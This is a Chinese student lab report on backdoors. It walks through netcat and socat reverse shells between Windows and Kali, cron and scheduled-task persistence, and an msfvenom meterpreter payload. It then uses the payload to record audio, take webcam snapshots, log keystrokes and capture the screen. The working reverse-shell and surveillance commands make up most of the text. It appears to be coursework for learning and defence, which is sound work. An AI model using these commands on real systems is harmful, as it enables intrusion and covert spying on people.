Exp2 后门原理实验内容

一、实践目标

• 使用netcat实现win,kali间的后门连接
• 使用socat实现win,kali间的后门连接
• meterpreter的应用

二、基础知识问答

(1)例举你能想到的一个后门进入到你系统中的可能方式？

在非官方网站上下载了病毒软件；
点击不安全网页链接；
使用未知风险的U盘。

(2)例举你知道的后门如何启动起来(win及linux)的方式？

修改linux的cron程序、注入shellcode、网络协议捆绑、社会工程学。

(3)Meterpreter有哪些给你映像深刻的功能？

录音，录像，屏幕截图，获取击键记录。

(4)如何发现自己有系统有没有被安装后门？

杀毒软件及防火墙反馈，还可以在终端中通过netstat命令查看有无异常开放的端口，定期检查是否有未知自启动项。

三、实验内容

1.使用netcat获取主机操作Shell，cron启动

1 Windows获取Kali虚拟机的shell

1.查看Windows主机的IP地址

ipconfig

2.在ncat.exe目录下打开cmd监听本机的1305端口

ncat.exe -l -p 1305

3.kali反弹连接Windows

nc 192.168.133.222 1305 -e /bin/sh

4.Windows返回kali的shell

ls

2 Kali虚拟机获取Windows的shell

1.获取Kali虚拟机的IP地址

2.Kali中开启监听

ncat -l -p 1305

3.Windows反弹连接

ncat.exe -e cmd.exe 192.168.37.130 1305

4.Kali虚拟机返回Windows的shell

dir

3 cron启动

1.Kali中执行crontab -e指令

crontab -e

2.设置自启动时间

40-55 * * * * /bin/netcat 192.168.133.222 1305 -e /bin/sh

则当主机时间为每小时的40-55分，若存在一台ip地址为 192.168.37.130的主机正在监听1305端口，该主机便可以获取到Kali的Shell

3.Windows主机在指定时间监听

ncat.exe -l -p 1305

2.使用socat获取主机操作Shell, 任务计划启动

1 Windows获取kali虚拟机的shell

1.Kali开放1305端口

socat tcp-listen:1305 system:bash,pty,stderr

2.Windows连接Kali虚拟机，验证shell功能

socat - tcp:192.168.133.222:1305

2 Kali虚拟机获得Windows的shell

1.Windows开放1305端口

socat tcp-listen:1305 exec:cmd,pty,stderr

2.Kali虚拟机连接Windows

socat - tcp:192.168.133.222:1305

3 任务计划启动

1.打开任务计划程序，单击创建任务，编辑名称

2.新建操作，新建触发器,将socat.exe所在位置填入并添加以下参数，其他选项不变

3.测试

socat - tcp:192.168.133.222:1305

3.使用MSF meterpreter生成可执行文件，利用ncat传送到主机并运行获取主机Shell

1 生成可执行文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.133.222 LPORT=1305 -f exe > shell.exe

2 利用ncat传送到主机并运行获取主机Shell

1.在Windows的cmd下开始监听1305端口

ncat.exe -l 1305 > shell.exe

2.Kali虚拟机传送shell.exe

nc 192.168.133.222 1305 < shell.exe

3.msf打开监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.37.130
set LPORT 1305

4.在Windows中打开shell.exe

5.获取主机shell

exploit

4.使用MSF meterpreter获取目标主机音频、摄像头、击键记录等内容，并尝试提权

1 获取目标主机音频

MSF exploit中输入record_mic指令进行录音，-d可设置时长

2 获取目标主机摄像头

webcam_snap

3 获取击键记录

keyscan_start开始捕获键盘记录，keyscan_dump获取击键记录，-d可设置时长

4 截取主机屏幕

screenshot

实验体会：

本次实验中通过对后门概念的理解和实际操作，掌握了后门的生成过程和注入方式，明白了后门其实就是留在计算机系统中，绕过了安全检测可以用某种方式控制计算机系统的途径。
实验中对ip比较模糊，经常不知道选择主机IP还是虚拟机IP，生成攻击文件ip用来传递参数，返回攻击者的电脑，用来连接的nc的ip为对方ip。另外，防火墙和杀毒软件多次阻止实验中断，也切实感受到了后门的工作原理、防火墙和杀毒软件的重要性。
对于不明网站上的软件下载和不安全链接以后会多多警惕。